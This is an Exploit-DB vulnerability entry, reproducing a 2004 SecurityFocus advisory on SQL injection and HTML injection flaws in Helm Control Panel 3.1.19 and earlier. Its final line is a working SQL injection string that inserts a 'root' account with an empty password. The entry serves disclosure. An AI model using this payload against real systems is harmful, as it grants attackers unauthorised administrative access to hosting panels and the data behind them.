WebHost Automation Helm Control Panel 3.1.x - Multiple Input Validation Vulnerabilities

EDB-ID:

24717


Platform:

ASP

Published:

2004-11-02

source: http://www.securityfocus.com/bid/11586/info

Helm Control Panel is reported prone to multiple vulnerabilities. These include an SQL injection issue and an HTML injection vulnerability. A remote attacker can execute arbitrary HTML and script code in a user's browser. Manipulation of SQL queries to reveal or corrupt sensitive database data is possible as well.

Helm Control Panel versions 3.1.19 and prior are reported vulnerable to these issues.

xxxx',10,0); insert into account(accountnumber,accounttype,accountpassword) values('root',0,'');--